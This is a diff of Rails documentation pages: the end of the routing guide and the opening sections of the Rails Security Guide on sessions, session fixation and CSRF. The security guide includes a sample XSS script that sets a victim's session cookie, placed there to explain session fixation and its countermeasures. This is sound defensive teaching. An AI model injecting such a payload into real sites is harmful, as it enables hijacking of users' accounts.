    You can specify static text when creating a route. In this case, the static text is used only for matching the incoming requests:

    -
    map.connect ':controller/:action/:id/with_user/:user_id'
    -
    -

    This route would respond to URLs such as /photos/show/1/with_user/2.

    +
    map.connect ':controller/:action/:id/with_user/:user_id'
    +

    This route would respond to URLs such as /photos/show/1/with_user/2.

    4.4. Querystring Parameters

    -

    Rails routing automatically picks up querystring parameters and makes them available in the params hash. For example, with this route:

    +

    Rails routing automatically picks up querystring parameters and makes them available in the params hash. For example, with this route:

    -
    map.connect ':controller/:action/:id'
    -
    -

    An incoming URL of /photos/show/1?user_id=2 will be dispatched to the show action of the Photos controller. params[:id] will be set to 1, and params[:user_id] will be equal to 2.

    +
    map.connect ':controller/:action/:id'
    +

    An incoming URL of /photos/show/1?user_id=2 will be dispatched to the show action of the Photos controller. params[:id] will be set to 1, and params[:user_id] will be equal to 2.

    4.5. Defining Defaults

    -

    You do not need to explicitly use the :controller and :action symbols within a route. You can supply defaults for these two parameters in a hash:

    +

    You do not need to explicitly use the :controller and :action symbols within a route. You can supply defaults for these two parameters in a hash:

    -
    map.connect 'photos/:id', :controller => 'photos', :action => 'show'
    -
    -

    With this route, an incoming URL of /photos/12 would be dispatched to the show action within the Photos controller.

    -

    You an also define other defaults in a route by supplying a hash for the :defaults option. This even applies to parameters that are not explicitly defined elsewhere in the route. For example:

    +
    map.connect 'photos/:id', :controller => 'photos', :action => 'show'
    +

    With this route, an incoming URL of /photos/12 would be dispatched to the show action within the Photos controller.

    +

    You an also define other defaults in a route by supplying a hash for the :defaults option. This even applies to parameters that are not explicitly defined elsewhere in the route. For example:

    -
    map.connect 'photos/:id', :controller => 'photos', :action => 'show', :defaults => { :format => 'jpg' }
    -
    -

    With this route, an incoming URL of photos/12 would be dispatched to the show action within the Photos controller, and params[:format] will be set to jpg.

    +
    map.connect 'photos/:id', :controller => 'photos', :action => 'show', :defaults => { :format => 'jpg' }
    +

    With this route, an incoming URL of photos/12 would be dispatched to the show action within the Photos controller, and params[:format] will be set to jpg.

    4.6. Named Routes

    -

    Regular routes need not use the connect method. You can use any other name here to create a named route. For example,

    +

    Regular routes need not use the connect method. You can use any other name here to create a named route. For example,

    -
    map.logout '/logout', :controller => 'sessions', :action => 'destroy'
    -
    -

    This will do two things. First, requests to /logout will be sent to the destroy method of the Sessions controller. Second, Rails will maintain the logout_path and logout_url helpers for use within your code.

    +
    map.logout '/logout', :controller => 'sessions', :action => 'destroy'
    +

    This will do two things. First, requests to /logout will be sent to the destroy method of the Sessions controller. Second, Rails will maintain the logout_path and logout_url helpers for use within your code.

    4.7. Route Requirements

    -

    You can use the :requirements option to enforce a format for any parameter in a route:

    +

    You can use the :requirements option to enforce a format for any parameter in a route:

    map.connect 'photo/:id', :controller => 'photos', :action => 'show',
    - :requirements => { :id => /[A-Z]\d{5}/ }
    -
    -

    This route would respond to URLs such as /photo/A12345. You can more succinctly express the same route this way:

    + :requirements => { :id => /[A-Z]\d{5}/ } +

    This route would respond to URLs such as /photo/A12345. You can more succinctly express the same route this way:

    map.connect 'photo/:id', :controller => 'photos', :action => 'show',
    -  :id => /[A-Z]\d{5}/
    -
    + :id => /[A-Z]\d{5}/

    4.8. Route Conditions

    -

    Route conditions (introduced with the :conditions option) are designed to implement restrictions on routes. Currently, the only supported restriction is :method:

    +

    Route conditions (introduced with the :conditions option) are designed to implement restrictions on routes. Currently, the only supported restriction is :method:

    map.connect 'photo/:id', :controller => 'photos', :action => 'show',
    - :conditions => { :method => :get }
    -
    -

    As with conditions in RESTful routes, you can specify :get, :post, :put, :delete, or :any for the acceptable method.

    + :conditions => { :method => :get } +

    As with conditions in RESTful routes, you can specify :get, :post, :put, :delete, or :any for the acceptable method.

    4.9. Route Globbing

    -

    Route globbing is a way to specify that a particular parameter (which must be the last parameter in the route) should be matched to all the remaining parts of a route. For example

    +

    Route globbing is a way to specify that a particular parameter (which must be the last parameter in the route) should be matched to all the remaining parts of a route. For example

    -
    map.connect 'photo/*other', :controller => 'photos', :action => 'unknown',
    -
    -

    This route would match photo/12 or /photo/long/path/to/12 equally well, creating an array of path segments as the value of params[:other].

    +
    map.connect 'photo/*other', :controller => 'photos', :action => 'unknown',
    +

    This route would match photo/12 or /photo/long/path/to/12 equally well, creating an array of path segments as the value of params[:other].

    4.10. Route Options

    -

    You can use :with_options to simplify defining groups of similar routes:

    +

    You can use :with_options to simplify defining groups of similar routes:

    photo.list '', :action => 'index' photo.delete ':id/delete', :action => 'delete' photo.edit ':id/edit', :action => 'edit' -end -
    -

    The importance of map.with_options has declined with the introduction of RESTful routes.

    +end +

    The importance of map.with_options has declined with the introduction of RESTful routes.

    5. Formats and respond_to

    -

    There's one more way in which routing can do different things depending on differences in the incoming HTTP request: by issuing a response that corresponds to what the request specifies that it will accept. In Rails routing, you can control this with the special :format parameter in the route.

    -

    For instance, consider the second of the default routes in the boilerplate routes.rb file:

    +

    There’s one more way in which routing can do different things depending on differences in the incoming HTTP request: by issuing a response that corresponds to what the request specifies that it will accept. In Rails routing, you can control this with the special :format parameter in the route.

    +

    For instance, consider the second of the default routes in the boilerplate routes.rb file:

    -
    map.connect ':controller/:action/:id.:format'
    -
    -

    This route matches requests such as /photo/edit/1.xml or /photo/show/2.rss. Within the appropriate action code, you can issue different responses depending on the requested format:

    +
    map.connect ':controller/:action/:id.:format'
    +

    This route matches requests such as /photo/edit/1.xml or /photo/show/2.rss. Within the appropriate action code, you can issue different responses depending on the requested format:

    respond_to do |format|
       format.html # return the default template for HTML
       format.xml { render :xml => @photo.to_xml }
    -end
    -
    +end

    5.1. Specifying the Format with an HTTP Header

    -

    If there is no :format parameter in the route, Rails will automatically look at the HTTP Accept header to determine the desired format.

    +

    If there is no :format parameter in the route, Rails will automatically look at the HTTP Accept header to determine the desired format.

    5.2. Recognized MIME types

    -

    By default, Rails recognizes html, text, json, csv, xml, rss, atom, and yaml as acceptable response types. If you need types beyond this, you can register them in your environment:

    +

    By default, Rails recognizes html, text, json, csv, xml, rss, atom, and yaml as acceptable response types. If you need types beyond this, you can register them in your environment:

    -
    Mime::Type.register "image/jpg", :jpg
    -
    +
    Mime::Type.register "image/jpg", :jpg

    6. The Default Routes

    -

    When you create a new Rails application, routes.rb is initialized with two default routes:

    +

    When you create a new Rails application, routes.rb is initialized with two default routes:

    map.connect ':controller/:action/:id'
    -map.connect ':controller/:action/:id.:format'
    -
    -

    These routes provide reasonable defaults for many URLs, if you're not using RESTful routing.

    +map.connect ':controller/:action/:id.:format'
    +

    These routes provide reasonable defaults for many URLs, if you’re not using RESTful routing.

    - +
    Note The default routes will make every action of every controller in your application accessible to GET requests. If you've designed your application to make consistent use of RESTful and named routes, you should comment out the default routes to prevent access to your controllers through the wrong verbs. If you've had the default routes enabled during development, though, you need to be sure that you haven't unwittingly depended on them somewhere in your application - otherwise you may find mysterious failures when you disable them.The default routes will make every action of every controller in your application accessible to GET requests. If you’ve designed your application to make consistent use of RESTful and named routes, you should comment out the default routes to prevent access to your controllers through the wrong verbs. If you’ve had the default routes enabled during development, though, you need to be sure that you haven’t unwittingly depended on them somewhere in your application - otherwise you may find mysterious failures when you disable them.

    7. The Empty Route

    -

    Don't confuse the default routes with the empty route. The empty route has one specific purpose: to route requests that come in to the root of the web site. For example, if your site is example.com, then requests to http://example.com or http://example.com/ will be handled by the empty route.

    +

    Don’t confuse the default routes with the empty route. The empty route has one specific purpose: to route requests that come in to the root of the web site. For example, if your site is example.com, then requests to http://example.com or http://example.com/ will be handled by the empty route.

    7.1. Using map.root

    -

    The preferred way to set up the empty route is with the map.root command:

    +

    The preferred way to set up the empty route is with the map.root command:

    -
    map.root :controller => "pages", :action => "main"
    -
    -

    The use of the root method tells Rails that this route applies to requests for the root of the site.

    -

    For better readability, you can specify an already-created route in your call to map.root:

    +
    map.root :controller => "pages", :action => "main"
    +

    The use of the root method tells Rails that this route applies to requests for the root of the site.

    +

    For better readability, you can specify an already-created route in your call to map.root:

    map.index 'index', :controller => "pages", :action => "main"
    -map.root :index
    -
    -

    Because of the top-down processing of the file, the named route must be specified before the call to map.root.

    +map.root :index +

    Because of the top-down processing of the file, the named route must be specified before the call to map.root.

    7.2. Connecting the Empty String

    -

    You can also specify an empty route by explicitly connecting the empty string:

    +

    You can also specify an empty route by explicitly connecting the empty string:

    -
    map.connect '', :controller => "pages", :action => "main"
    -
    +
    map.connect '', :controller => "pages", :action => "main"
    - +
    @@ -2080,10 +2016,10 @@ http://www.gnu.org/software/src-highlite -->

    8. Inspecting and Testing Routes

    -

    Routing in your application should not be a "black box" that you never open. Rails offers built-in tools for both inspecting and testing routes.

    +

    Routing in your application should not be a "black box" that you never open. Rails offers built-in tools for both inspecting and testing routes.

    8.1. Seeing Existing Routes with rake

    -

    If you want a complete list of all of the available routes in your application, run the rake routes command. This will dump all of your routes to the console, in the same order that they appear in routes.rb. For each route, you'll see:

    -
      +

      If you want a complete list of all of the available routes in your application, run the rake routes command. This will dump all of your routes to the console, in the same order that they appear in routes.rb. For each route, you’ll see:

      +
      • The route name (if any) @@ -2091,7 +2027,7 @@ The route name (if any)

      • -The HTTP verb used (if the route doesn't respond to all verbs) +The HTTP verb used (if the route doesn’t respond to all verbs)

      • @@ -2105,7 +2041,7 @@ The routing parameters that will be generated by this URL

      -

      For example, here's a small section of the rake routes output for a RESTful route:

      +

      For example, here’s a small section of the rake routes output for a RESTful route:

                users GET  /users          {:controller=>"users", :action=>"index"}
      @@ -2118,12 +2054,12 @@ formatted_users GET  /users.:format  {:controller=>"users", :action=>"inde
       
    Tip You'll find that the output from rake routes is much more readable if you widen your terminal window until the output lines don't wrap.You’ll find that the output from rake routes is much more readable if you widen your terminal window until the output lines don’t wrap.

    8.2. Testing Routes

    -

    Routes should be included in your testing strategy (just like the rest of your application). Rails offers three built-in assertions designed to make testing routes simpler:

    -
      +

      Routes should be included in your testing strategy (just like the rest of your application). Rails offers three built-in assertions designed to make testing routes simpler:

      +
      • assert_generates @@ -2141,54 +2077,49 @@ formatted_users GET /users.:format {:controller=>"users", :action=>"inde

      8.2.1. The assert_generates Assertion

      -

      Use assert_generates to assert that a particular set of options generate a particular path. You can use this with default routes or custom routes

      +

      Use assert_generates to assert that a particular set of options generate a particular path. You can use this with default routes or custom routes

      assert_generates "/photos/1", { :controller => "photos", :action => "show", :id => "1" }
      -assert_generates "/about", :controller => "pages", :action => "about"
      -
      +assert_generates "/about", :controller => "pages", :action => "about"

    8.2.2. The assert_recognizes Assertion

    -

    The assert_recognizes assertion is the inverse of assert_generates. It asserts that Rails recognizes the given path and routes it to a particular spot in your application.

    +

    The assert_recognizes assertion is the inverse of assert_generates. It asserts that Rails recognizes the given path and routes it to a particular spot in your application.

    -
    assert_recognizes { :controller => "photos", :action => "show", :id => "1" }, "/photos/1"
    -
    -

    You can supply a :method argument to specify the HTTP verb:

    +
    assert_recognizes { :controller => "photos", :action => "show", :id => "1" }, "/photos/1"
    +

    You can supply a :method argument to specify the HTTP verb:

    -
    assert_recognizes { :controller => "photos", :action => "create" }, { :path => "photos", :method => :post }
    -
    -

    You can also use the RESTful helpers to test recognition of a RESTful route:

    +
    assert_recognizes { :controller => "photos", :action => "create" }, { :path => "photos", :method => :post }
    +

    You can also use the RESTful helpers to test recognition of a RESTful route:

    -
    assert_recognizes new_photo_url, { :path => "photos", :method => :post }
    -
    +
    assert_recognizes new_photo_url, { :path => "photos", :method => :post }

    8.2.3. The assert_routing Assertion

    -

    The assert_routing assertion checks the route both ways: it tests that the path generates the options, and that the options generate the path. Thus, it combines the functions of assert_generates and assert_recognizes.

    +

    The assert_routing assertion checks the route both ways: it tests that the path generates the options, and that the options generate the path. Thus, it combines the functions of assert_generates and assert_recognizes.

    -
    assert_routing { :path => "photos", :method => :post }, { :controller => "photos", :action => "create" }
    -
    +
    assert_routing { :path => "photos", :method => :post }, { :controller => "photos", :action => "create" }

    9. Changelog

    - -
      + +
      • October 4, 2008: Added additional detail on specifying verbs for resource member/collection routes , by Mike Gunderloy diff --git a/railties/doc/guides/html/security.html b/railties/doc/guides/html/security.html index 390efb5435..4cbc8214b9 100644 --- a/railties/doc/guides/html/security.html +++ b/railties/doc/guides/html/security.html @@ -320,9 +320,9 @@ ul#navMain {

        Ruby On Rails Security Guide

        -

        This manual describes common security problems in web applications and how to avoid them with Rails. If you have any questions or suggestions, please +

        This manual describes common security problems in web applications and how to avoid them with Rails. If you have any questions or suggestions, please mail me, Heiko Webers, at 42 {et} rorsecurity.info. After reading it, you should be familiar with:

        -
          +
          • All countermeasures that are highlighted @@ -363,36 +363,35 @@ And the most popular injection attack methods

          1. Introduction

          -

          Web application frameworks are made to help developers building web applications. Some of them also help you with securing the web application. In fact one framework is not more secure than another: If you use it correctly, you will be able to build secure apps with many frameworks. Ruby on Rails has some clever helper methods, for example against SQL injection, so that this is hardly a problem. It‘s nice to see that all of the Rails applications I audited had a good level of security.

          -

          In general there is no such thing as plug-n-play security. Security depends on the people using the framework, and sometimes on the development method. And it depends on all layers of a web application environment: The back-end storage, the web server and the web application itself (and possibly other layers or applications).

          -

          The Gartner Group however estimates that 75% of attacks are at the web application layer, and found out "that out of 300 audited sites, 97% are vulnerable to attack". This is because web applications are relatively easy to attack, as they are simple to understand and manipulate, even by the lay person.

          -

          The threats against web applications include user account hijacking, bypass of access control, reading or modifying sensitive data, or presenting fraudulent content. Or an attacker might be able to install a Trojan horse program or unsolicited e-mail sending software, aim at financial enrichment or cause brand name damage by modifying company resources. In order to prevent attacks, minimize their impact and remove points of attack, first of all, you have to fully understand the attack methods in order to find the correct countermeasures. That is what this guide aims at.

          -

          In order to develop secure web applications you have to keep up to date on all layers and know your enemies. To keep up to date subscribe to security mailing lists, read security blogs and make updating and security checks a habit (check the Additional Resources chapter). I do it manually because that‘s how you find the nasty logical security problems.

          +

          Web application frameworks are made to help developers building web applications. Some of them also help you with securing the web application. In fact one framework is not more secure than another: If you use it correctly, you will be able to build secure apps with many frameworks. Ruby on Rails has some clever helper methods, for example against SQL injection, so that this is hardly a problem. It‘s nice to see that all of the Rails applications I audited had a good level of security.

          +

          In general there is no such thing as plug-n-play security. Security depends on the people using the framework, and sometimes on the development method. And it depends on all layers of a web application environment: The back-end storage, the web server and the web application itself (and possibly other layers or applications).

          +

          The Gartner Group however estimates that 75% of attacks are at the web application layer, and found out "that out of 300 audited sites, 97% are vulnerable to attack". This is because web applications are relatively easy to attack, as they are simple to understand and manipulate, even by the lay person.

          +

          The threats against web applications include user account hijacking, bypass of access control, reading or modifying sensitive data, or presenting fraudulent content. Or an attacker might be able to install a Trojan horse program or unsolicited e-mail sending software, aim at financial enrichment or cause brand name damage by modifying company resources. In order to prevent attacks, minimize their impact and remove points of attack, first of all, you have to fully understand the attack methods in order to find the correct countermeasures. That is what this guide aims at.

          +

          In order to develop secure web applications you have to keep up to date on all layers and know your enemies. To keep up to date subscribe to security mailing lists, read security blogs and make updating and security checks a habit (check the Additional Resources chapter). I do it manually because that‘s how you find the nasty logical security problems.

          2. Sessions

          -

          A good place to start looking at security is with sessions, which can be vulnerable to particular attacks.

          +

          A good place to start looking at security is with sessions, which can be vulnerable to particular attacks.

          2.1. What are sessions?

          -

          HTTP is a stateless protocol Sessions make it stateful.

          -

          Most applications need to keep track of certain state of a particular user. This could be the contents of a shopping basket or the user id of the currently logged in user. Without the idea of sessions, the user would have to identify, and probably authenticate, on every request. +

          -- HTTP is a stateless protocol Sessions make it stateful.

          +

          Most applications need to keep track of certain state of a particular user. This could be the contents of a shopping basket or the user id of the currently logged in user. Without the idea of sessions, the user would have to identify, and probably authenticate, on every request. Rails will create a new session automatically if a new user accesses the application. It will load an existing session if the user has already used the application.

          -

          A session usually consists of a hash of values and a session id, usually a 32-character string, to identify the hash. Every cookie sent to the client's browser includes the session id. And the other way round: the browser will send it to the server on every request from the client. In Rails you can save and retrieve values using the session method:

          +

          A session usually consists of a hash of values and a session id, usually a 32-character string, to identify the hash. Every cookie sent to the client’s browser includes the session id. And the other way round: the browser will send it to the server on every request from the client. In Rails you can save and retrieve values using the session method:

          session[:user_id] = @current_user.id
          -User.find(session[:user_id])
          -
          +User.find(session[:user_id])

          2.2. Session id

          -

          The session id is a 32 byte long MD5 hash value.

          -

          A session id consists of the hash value of a random string. The random string is the current time, a random number between 0 and 1, the process id number of the Ruby interpreter (also basically a random number) and a constant string. Currently it is not feasible to brute-force Rails' session ids. To date MD5 is uncompromised, but there have been collisions, so it is theoretically possible to create another input text with the same hash value. But this has had no security impact to date.

          +

          -- The session id is a 32 byte long MD5 hash value.

          +

          A session id consists of the hash value of a random string. The random string is the current time, a random number between 0 and 1, the process id number of the Ruby interpreter (also basically a random number) and a constant string. Currently it is not feasible to brute-force Rails' session ids. To date MD5 is uncompromised, but there have been collisions, so it is theoretically possible to create another input text with the same hash value. But this has had no security impact to date.

          2.3. Session hijacking

          -

          Stealing a user's session id lets an attacker use the web application in the victim's name.

          -

          Many web applications have an authentication system: a user provides a user name and password, the web application checks them and stores the corresponding user id in the session hash. From now on, the session is valid. On every request the application will load the user, identified by the user id in the session, without the need for new authentication. The session id in the cookie identifies the session.

          -

          Hence, the cookie serves as temporary authentication for the web application. Everyone who seizes a cookie from someone else, may use the web application as this user – with possibly severe consequences. Here are some ways to hijack a session, and their countermeasures:

          -
            +

            -- Stealing a user’s session id lets an attacker use the web application in the victim’s name.

            +

            Many web applications have an authentication system: a user provides a user name and password, the web application checks them and stores the corresponding user id in the session hash. From now on, the session is valid. On every request the application will load the user, identified by the user id in the session, without the need for new authentication. The session id in the cookie identifies the session.

            +

            Hence, the cookie serves as temporary authentication for the web application. Everyone who seizes a cookie from someone else, may use the web application as this user – with possibly severe consequences. Here are some ways to hijack a session, and their countermeasures:

            +
            • Sniff the cookie in an insecure network. A wireless LAN can be an example of such a network. In an unencrypted wireless LAN it is especially easy to listen to the traffic of all connected clients. This is one more reason not to work from a coffee shop. For the web application builder this means to provide a secure connection over SSL. @@ -400,28 +399,28 @@ Sniff the cookie in an insecure network. A wireless LAN can be an example of suc

            • -Most people don't clear out the cookies after working at a public terminal. So if the last user didn't log out of a web application, you would be able to use it as this user. Provide the user with a log-out button in the web application, and make it prominent. +Most people don’t clear out the cookies after working at a public terminal. So if the last user didn’t log out of a web application, you would be able to use it as this user. Provide the user with a log-out button in the web application, and make it prominent.

            • -Many cross-site scripting (XSS) exploits aim at obtaining the user's cookie. You'll read more about XSS later. +Many cross-site scripting (XSS) exploits aim at obtaining the user’s cookie. You’ll read more about XSS later.

            • -Instead of stealing a cookie unknown to the attacker, he fixes a user's session identifier (in the cookie) known to him. Read more about this so-called session fixation later. +Instead of stealing a cookie unknown to the attacker, he fixes a user’s session identifier (in the cookie) known to him. Read more about this so-called session fixation later.

            -

            The main objective of most attackers is to make money. The underground prices for stolen bank login accounts range from $10-$1000 (depending on the available amount of funds), $0.40-$20 for credit card numbers, $1-$8 for online auction site accounts and $4-$30 for email passwords, according to the Symantec Global Internet Security Threat Report.

            +

            The main objective of most attackers is to make money. The underground prices for stolen bank login accounts range from $10-$1000 (depending on the available amount of funds), $0.40-$20 for credit card numbers, $1-$8 for online auction site accounts and $4-$30 for email passwords, according to the Symantec Global Internet Security Threat Report.

            2.4. Session guidelines

            -

            Here are some general guidelines on sessions.

            -
              +

              -- Here are some general guidelines on sessions.

              +
              • -Do not store large objects in a session. Instead you should store them in the database and save their id in the session. This will eliminate synchronization headaches and it won't fill up your session storage space (depending on what session storage you chose, see below). -This will also be a good idea, if you modify the structure of an object and old versions of it are still in some user's cookies. With server-side session storages you can clear out the sessions, but with client-side storages, this is hard to mitigate. +Do not store large objects in a session. Instead you should store them in the database and save their id in the session. This will eliminate synchronization headaches and it won’t fill up your session storage space (depending on what session storage you chose, see below). +This will also be a good idea, if you modify the structure of an object and old versions of it are still in some user’s cookies. With server-side session storages you can clear out the sessions, but with client-side storages, this is hard to mitigate.

              • @@ -431,22 +430,22 @@ This will also be a good idea, if you modify the structure of an object and old

              2.5. Session storage

              -

              Rails provides several storage mechanisms for the session hashes. The most important are ActiveRecordStore and CookieStore.

              -

              There are a number of session storages, i.e. where Rails saves the session hash and session id. Most real-live applications choose ActiveRecordStore (or one of its derivatives) over file storage due to performance and maintenance reasons. ActiveRecordStore keeps the session id and hash in a database table and saves and retrieves the hash on every request.

              -

              Rails 2 introduced a new default session storage, CookieStore. CookieStore saves the session hash directly in a cookie on the client-side. The server retrieves the session hash from the cookie and eliminates the need for a session id. That will greatly increase the speed of the application, but it is a controversial storage option and you have to think about the security implications of it:

              -
                +

                -- Rails provides several storage mechanisms for the session hashes. The most important are ActiveRecordStore and CookieStore.

                +

                There are a number of session storages, i.e. where Rails saves the session hash and session id. Most real-live applications choose ActiveRecordStore (or one of its derivatives) over file storage due to performance and maintenance reasons. ActiveRecordStore keeps the session id and hash in a database table and saves and retrieves the hash on every request.

                +

                Rails 2 introduced a new default session storage, CookieStore. CookieStore saves the session hash directly in a cookie on the client-side. The server retrieves the session hash from the cookie and eliminates the need for a session id. That will greatly increase the speed of the application, but it is a controversial storage option and you have to think about the security implications of it:

                +
                • -Cookies imply a strict size limit of 4K. This is fine as you should not store large amounts of data in a session anyway, as described before. Storing the current user's database id in a session is usually ok. +Cookies imply a strict size limit of 4K. This is fine as you should not store large amounts of data in a session anyway, as described before. Storing the current user’s database id in a session is usually ok.

                • -The client can see everything you store in a session, because it is stored in clear-text (actually Base64-encoded, so not encrypted). So, of course, you don't want to store any secrets here. To prevent session hash tampering, a digest is calculated from the session with a server-side secret and inserted into the end of the cookie. +The client can see everything you store in a session, because it is stored in clear-text (actually Base64-encoded, so not encrypted). So, of course, you don’t want to store any secrets here. To prevent session hash tampering, a digest is calculated from the session with a server-side secret and inserted into the end of the cookie.

                -

                That means the security of this storage depends on this secret (and of the digest algorithm, which defaults to SHA512, which has not been compromised, yet). So don't use a trivial secret, i.e. a word from a dictionary, or one which is shorter than 30 characters. Put the secret in your environment.rb:

                +

                That means the security of this storage depends on this secret (and of the digest algorithm, which defaults to SHA512, which has not been compromised, yet). So don’t use a trivial secret, i.e. a word from a dictionary, or one which is shorter than 30 characters. Put the secret in your environment.rb:

                config.action_controller.session = {
                @@ -454,14 +453,14 @@ The client can see everything you store in a session, because it is stored in cl
                   :secret      => ‘0x0dkfj3927dkc7djdh36rkckdfzsg...’
                 }
                -

                There are, however, derivatives of CookieStore which encrypt the session hash, so the client cannot see it.

                +

                There are, however, derivatives of CookieStore which encrypt the session hash, so the client cannot see it.

                2.6. Replay attacks for CookieStore sessions

                -

                Another sort of attack you have to be aware of when using CookieStore is the replay attack.

                -

                It works like this:

                -
                  +

                  -- Another sort of attack you have to be aware of when using CookieStore is the replay attack.

                  +

                  It works like this:

                  +
                  • -A user receives credits, the amount is stored in a session (which is bad idea, anyway, but we'll do this for demonstration purposes). +A user receives credits, the amount is stored in a session (which is bad idea, anyway, but we’ll do this for demonstration purposes).

                  • @@ -485,16 +484,16 @@ The user has his credit back.

                  -

                  Including a nonce (a random value) in the session solves replay attacks. A nonce is valid only once, and the server has to keep track of all the valid nonces. It gets even more complicated if you have several application servers (mongrels). Storing nonces in a database table would defeat the entire purpose of CookieStore (avoiding accessing the database).

                  -

                  The best solution against it is not to store this kind of data in a session, but in the database. In this case store the credit in the database and the logged_in_user_id in the session.

                  +

                  Including a nonce (a random value) in the session solves replay attacks. A nonce is valid only once, and the server has to keep track of all the valid nonces. It gets even more complicated if you have several application servers (mongrels). Storing nonces in a database table would defeat the entire purpose of CookieStore (avoiding accessing the database).

                  +

                  The best solution against it is not to store this kind of data in a session, but in the database. In this case store the credit in the database and the logged_in_user_id in the session.

                  2.7. Session fixation

                  -

                  Apart from stealing a user's session id, the attacker may fix a session id known to him. This is called session fixation.

                  +

                  -- Apart from stealing a user’s session id, the attacker may fix a session id known to him. This is called session fixation.

                  Session fixation
                  -

                  This attack focuses on fixing a user's session id known to the attacker, and forcing the user's browser into using this id. It is therefore not necessary for the attacker to steal the session id afterwards. Here is how this attack works:

                  +

                  This attack focuses on fixing a user’s session id known to the attacker, and forcing the user’s browser into using this id. It is therefore not necessary for the attacker to steal the session id afterwards. Here is how this attack works:

                  1. @@ -508,13 +507,13 @@ He possibly maintains the session. Expiring sessions, for example every 20 minut

                  2. -Now the attacker will force the user's browser into using this session id (see number 3 in the image). As you may not change a cookie of another domain (because of the same origin policy), the attacker has to run a JavaScript from the domain of the target web application. Injecting the JavaScript code into the application by XSS accomplishes this attack. Here is an example: <script>
document.cookie="_session_id=16d5b78abb28e3d6206b60f22a03c8d9";
</script> +Now the attacker will force the user’s browser into using this session id (see number 3 in the image). As you may not change a cookie of another domain (because of the same origin policy), the attacker has to run a JavaScript from the domain of the target web application. Injecting the JavaScript code into the application by XSS accomplishes this attack. Here is an example: <script>
document.cookie="_session_id=16d5b78abb28e3d6206b60f22a03c8d9";
</script> Read more about XSS and injection later on.

                  3. -The attacker lures the victim to the infected page with the JavaScript code. By viewing the page, the victim's browser will change the session id to the trap session id. +The attacker lures the victim to the infected page with the JavaScript code. By viewing the page, the victim’s browser will change the session id to the trap session id.

                  4. @@ -524,25 +523,24 @@ As the new trap session is unused, the web application will require the user to
                  5. -From now on, the victim and the attacker will co-use the web application with the same session: The session became valid and the victim didn't notice the attack. +From now on, the victim and the attacker will co-use the web application with the same session: The session became valid and the victim didn’t notice the attack.

                  2.8. Session fixation – Countermeasures

                  -

                  One line of code will protect you from session fixation.

                  -

                  The most effective countermeasure is to issue a new session identifier and declare the old one invalid after a successful login. That way, an attacker cannot use the fixed session identifier. This is a good countermeasure against session hijacking, as well. Here is how to create a new session in Rails:

                  +

                  -- One line of code will protect you from session fixation.

                  +

                  The most effective countermeasure is to issue a new session identifier and declare the old one invalid after a successful login. That way, an attacker cannot use the fixed session identifier. This is a good countermeasure against session hijacking, as well. Here is how to create a new session in Rails:

                  -
                  reset_session
                  -
                  -

                  If you use the popular RestfulAuthentication plugin for user management, add reset_session to the SessionsController#create action. Note that this removes any value from the session, you have to transfer them to the new session.

                  -

                  Another countermeasure is to save user-specific properties in the session, verify them every time a request comes in, and deny access, if the information does not match. Such properties could be the remote IP address or the user agent (the web browser name), though the latter is less user-specific. When saving the IP address, you have to bear in mind that there are Internet service providers or large organizations that put their users behind proxies. These might change over the course of a session, so these users will not be able to use your application, or only in a limited way.

                  +
                  reset_session
              +

              If you use the popular RestfulAuthentication plugin for user management, add reset_session to the SessionsController#create action. Note that this removes any value from the session, you have to transfer them to the new session.

              +

              Another countermeasure is to save user-specific properties in the session, verify them every time a request comes in, and deny access, if the information does not match. Such properties could be the remote IP address or the user agent (the web browser name), though the latter is less user-specific. When saving the IP address, you have to bear in mind that there are Internet service providers or large organizations that put their users behind proxies. These might change over the course of a session, so these users will not be able to use your application, or only in a limited way.

              2.9. Session expiry

              -

              Sessions that never expire extend the time-frame for attacks such as cross-site reference forgery (CSRF), session hijacking and session fixation.

              -

              One possibility is to set the expiry time-stamp of the cookie with the session id. However the client can edit cookies that are stored in the web browser so expiring sessions on the server is safer. Here is an example of how to expire sessions in a database table. Call Session.sweep("20m") to expire sessions that were used longer than 20 minutes ago.

              +

              -- Sessions that never expire extend the time-frame for attacks such as cross-site reference forgery (CSRF), session hijacking and session fixation.

              +

              One possibility is to set the expiry time-stamp of the cookie with the session id. However the client can edit cookies that are stored in the web browser so expiring sessions on the server is safer. Here is an example of how to expire sessions in a database table. Call Session.sweep("20m") to expire sessions that were used longer than 20 minutes ago.

              endself.delete_all "updated_at < '#{time.to_s(:db)}'"end -
end -
              -

              The section about session fixation introduced the problem of maintained sessions. An attacker maintaining a session every five minutes can keep the session alive forever, although you are expiring sessions. A simple solution for this would be to add a created_at column to the sessions table. Now you can delete sessions that were created a long time ago. Use this line in the sweep method above:

              +
end
          +

          The section about session fixation introduced the problem of maintained sessions. An attacker maintaining a session every five minutes can keep the session alive forever, although you are expiring sessions. A simple solution for this would be to add a created_at column to the sessions table. Now you can delete sessions that were created a long time ago. Use this line in the sweep method above:

          -
          self.delete_all "updated_at < '#{time.to_s(:db)}' OR created_at < '#{2.days.ago.to_s(:db)}'"
          -
          +
          self.delete_all "updated_at < '#{time.to_s(:db)}' OR created_at < '#{2.days.ago.to_s(:db)}'"

        3. Cross-Site Reference Forgery (CSRF)

        -

        This attack method works by including malicious code or a link in a page that accesses a web application that the user is believed to have authenticated. If the session for that web application has not timed out, an attacker may execute unauthorized commands.

        +

        -- This attack method works by including malicious code or a link in a page that accesses a web application that the user is believed to have authenticated. If the session for that web application has not timed out, an attacker may execute unauthorized commands.

        CSRF
        -

        In the session chapter you have learned that most Rails applications use cookie-based sessions. Either they store the session id in the cookie and have a server-side session hash, or the entire session hash is on the client-side. In either case the browser will automatically send along the cookie on every request to a domain, if it can find a cookie for that domain. The controversial point is, that it will also send the cookie, if the request comes from a site of a different domain. Let's start with an example:

        -
          +

          In the session chapter you have learned that most Rails applications use cookie-based sessions. Either they store the session id in the cookie and have a server-side session hash, or the entire session hash is on the client-side. In either case the browser will automatically send along the cookie on every request to a domain, if it can find a cookie for that domain. The controversial point is, that it will also send the cookie, if the request comes from a site of a different domain. Let’s start with an example:

          +
          • -Bob browses a message board and views a post from a hacker where there is a crafted HTML image element. The element references a command in Bob's project management application, rather than an image file. +Bob browses a message board and views a post from a hacker where there is a crafted HTML image element. The element references a command in Bob’s project management application, rather than an image file.

          • @@ -591,7 +587,7 @@ Bob browses a message board and views a post from a hacker where there is a craf
          • -Bob's session at www.webapp.com is still alive, because he didn't log out a few minutes ago. +Bob’s session at www.webapp.com is still alive, because he didn’t log out a few minutes ago.

          • @@ -606,25 +602,25 @@ The web application at www.webapp.com verifies the user information in the corre
